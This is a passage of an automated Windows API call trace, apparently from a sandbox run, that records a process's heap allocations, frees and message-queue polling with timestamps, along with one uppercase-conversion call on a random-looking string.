lpMem=0x12fec90 | out: hHeap=0x12c0000) returned 1 [0119.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedf8 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0119.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xca) returned 0x1302b30 [0119.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb50 [0119.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd220 [0119.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd220 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb50 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedf8 | out: hHeap=0x12c0000) returned 1 [0119.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c211) returned 0x1303e48 [0119.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be1f8 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919b8 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2e0 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0119.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef510 | out: hHeap=0x12c0000) returned 1 [0119.683] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0119.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ce8 [0119.684] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0119.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0119.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0119.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef4e0 [0119.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd268 [0119.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5a0 [0119.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef510 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd280 [0119.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0119.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb50 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3148 [0119.687] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef560 [0119.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef560 | out: hHeap=0x12c0000) returned 1 [0119.687] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.688] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedf8 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef560 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2e0 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0119.688] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5c0 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0119.689] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5b0 [0119.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd220 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0119.689] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5c0 [0119.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300d20 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.689] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.690] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0119.690] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0119.690] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7c0 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0119.690] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0119.691] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0119.691] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0119.691] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0119.691] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0119.691] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919f8 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919f8 | out: hHeap=0x12c0000) returned 1 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0119.692] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0119.692] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0119.692] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0119.692] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e18 [0119.693] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e18 | out: hHeap=0x12c0000) returned 1 [0119.693] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0119.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0119.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0119.693] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.693] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0119.693] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.694] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef790 [0119.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0119.694] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.695] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.695] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.695] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919b8 